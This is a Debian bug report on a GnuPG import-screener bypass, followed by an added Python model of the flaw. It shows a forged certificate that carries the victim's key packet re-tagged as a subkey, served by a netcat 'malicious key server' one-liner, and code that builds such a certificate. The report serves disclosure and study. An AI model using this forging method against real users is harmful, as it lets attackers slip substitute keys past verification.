Package: gnupg Version: 2.1.18-8~deb9u2 Tags: security
To fix #725411, an import screener was implemented, which rejects keys with fingerprints other than those that were requested by the user.
Unfortunately, it's possible to bypass the import screener by appending a crafted subkey to an arbitrary key:
$ gpg --keyserver keyserver.ubuntu.com --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key CCD2ED94D21739E9: public key "Daniel Kahn Gillmor <d...@fifthhorseman.net>" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg:               imported: 1

$ (printf 'HTTP/1.0 200 OK\n\n'; cat fakeCCD2ED94D21739E9.pgp) | nc.openbsd -N -l -p 11371 > /dev/null &  # poor man's malicious key server

$ gpg --keyserver localhost --recv-key 0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key 60B0EEAA28CB19E1: "Totally Legit Signing Key <mall...@example.org>" not changed
gpg: Total number processed: 1
gpg:              unchanged: 1

$ gpg --list-packets fakeCCD2ED94D21739E9.pgp | tail -n6
# off=402 ctb=b9 tag=14 hlen=3 plen=525
:public sub key packet:
	version 4, algo 1, created 1180812858, expires 0
	pkey[0]: [4096 bits]
	pkey[1]: [17 bits]
	keyid: CCD2ED94D21739E9

The subkey was made by taking the original key's public key and changing the packet's tag, so it has the same fingerprint as the original key.
-- System Information:
Architecture: amd64

Versions of packages gnupg depends on:
ii  gnupg-agent    2.1.18-8~deb9u2
ii  libassuan0     2.4.3-2
ii  libbz2-1.0     1.0.6-8.1
ii  libc6          2.24-11+deb9u3
ii  libgcrypt20    1.7.6-2+deb9u3
ii  libgpg-error0  1.26-2
ii  libksba8       1.3.5-2
ii  libreadline7   7.0-3
ii  libsqlite3-0   3.16.2-5+deb9u1
ii  zlib1g         1:1.2.8.dfsg-5

Versions of packages gnupg recommends:
ii  dirmngr     2.1.18-8~deb9u2
pn  gnupg-l10n  <none>

-- 
Jakub Wilk
fakeCCD2ED94D21739E9.pgp
Description: Binary data
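The following is an added worked model of the bypass described in the report above; it is not part of the bug report and is not GnuPG's code or its fix. It shows why re-tagging works: a v4 fingerprint is SHA-1 over 0x99, a two-octet length and the key packet body (RFC 4880, section 12.2), and the packet header carrying the tag is never hashed. In old-format encoding a public-key packet with a two-octet length has CTB 0x99 and the same packet re-tagged as a public subkey has CTB 0xb9, exactly the ctb=b9 shown by --list-packets, so the attacker's edit is a single byte. The RSA parameters, user IDs, the two screener functions and the names retag, naive_screener and primary_only_screener are all constructed for this illustration and are assumptions, not GnuPG behaviour.

```python
"""Model of the import-screener bypass: a v4 public-key packet re-tagged as a
public-subkey packet keeps its fingerprint, because the fingerprint hashes the
packet body under a fixed 0x99 prefix and never the packet header.
Added illustration only; constructed keys, simplified screeners."""
import hashlib
import struct

TAG_PUBLIC_KEY = 6
TAG_USER_ID = 13
TAG_PUBLIC_SUBKEY = 14


def mpi(n):
    """OpenPGP MPI: two-octet bit count followed by the big-endian magnitude."""
    bits = n.bit_length()
    return struct.pack(">H", bits) + n.to_bytes((bits + 7) // 8, "big")


def old_format_packet(tag, body):
    """Old-format header with a two-octet length (length type 1), as gpg emits
    for large key packets: CTB = 0x80 | tag << 2 | 1, then the length."""
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body


def retag(packet, new_tag):
    """The attacker's one-byte edit: keep the length-type bits, replace the tag bits."""
    return bytes([0x80 | (new_tag << 2) | (packet[0] & 0x03)]) + packet[1:]


def parse_packets(data):
    """Yield (tag, body) for a stream of old-format packets with explicit lengths."""
    i = 0
    while i < len(data):
        ctb = data[i]
        if ctb & 0xC0 != 0x80:
            raise ValueError("only old-format headers are modelled here")
        tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
        if ltype == 0:
            plen, hlen = data[i + 1], 2
        elif ltype == 1:
            plen, hlen = struct.unpack(">H", data[i + 1:i + 3])[0], 3
        elif ltype == 2:
            plen, hlen = struct.unpack(">I", data[i + 1:i + 5])[0], 5
        else:
            raise ValueError("indeterminate length not modelled")
        yield tag, data[i + hlen:i + hlen + plen]
        i += hlen + plen


def v4_fingerprint(key_body):
    """SHA-1(0x99 || two-octet length || body); the tag of the source packet plays no part."""
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(key_body)) + key_body).hexdigest().upper()


def rsa_key_body(created, n, e):
    """Body of a v4 public-key packet: version 4, creation time, algo 1 (RSA), MPIs n and e."""
    return b"\x04" + struct.pack(">I", created) + b"\x01" + mpi(n) + mpi(e)


# Constructed keys with toy RSA moduli (not real keys; only the packet layout matters here).
VICTIM_BODY = rsa_key_body(1180812858, 0xC0FFEE123456789ABCDEF01, 65537)
VICTIM_FPR = v4_fingerprint(VICTIM_BODY)
VICTIM_CERT = (old_format_packet(TAG_PUBLIC_KEY, VICTIM_BODY)
               + old_format_packet(TAG_USER_ID, b"Victim <victim@example.org>"))

# The attacker's own certificate with the victim's key packet appended as a re-tagged subkey.
ATTACKER_BODY = rsa_key_body(1525000000, 0xBADC0DE0BADF00DCAFE, 65537)
FAKE_CERT = (old_format_packet(TAG_PUBLIC_KEY, ATTACKER_BODY)
             + old_format_packet(TAG_USER_ID, b"Totally Legit Signing Key <attacker@example.org>")
             + retag(old_format_packet(TAG_PUBLIC_KEY, VICTIM_BODY), TAG_PUBLIC_SUBKEY))


def key_fingerprints(cert):
    """(tag, fingerprint) for every primary-key and subkey packet in the certificate."""
    return [(tag, v4_fingerprint(body)) for tag, body in parse_packets(cert)
            if tag in (TAG_PUBLIC_KEY, TAG_PUBLIC_SUBKEY)]


def naive_screener(cert, requested_fpr):
    """Bypassable model: accept if any primary-key or subkey packet matches the request."""
    return any(fpr == requested_fpr for _, fpr in key_fingerprints(cert))


def primary_only_screener(cert, requested_fpr):
    """Stricter model: the requested fingerprint must match the primary-key packet itself."""
    return any(tag == TAG_PUBLIC_KEY and fpr == requested_fpr for tag, fpr in key_fingerprints(cert))


if __name__ == "__main__":
    for tag, fpr in key_fingerprints(FAKE_CERT):
        print(f"tag={tag:2d} fpr={fpr}")
    print("naive screener accepts fake cert:", naive_screener(FAKE_CERT, VICTIM_FPR))
    print("primary-only screener accepts it:", primary_only_screener(FAKE_CERT, VICTIM_FPR))
```

Running the block lists the attacker's primary fingerprint followed by a tag-14 entry whose fingerprint equals VICTIM_FPR, and the naive screener accepts the forged certificate while the primary-only one rejects it. The primary-only model is a deliberate simplification: it would also reject a legitimate --recv-key lookup by subkey fingerprint, so it illustrates where the bypass lives rather than what a production fix should look like.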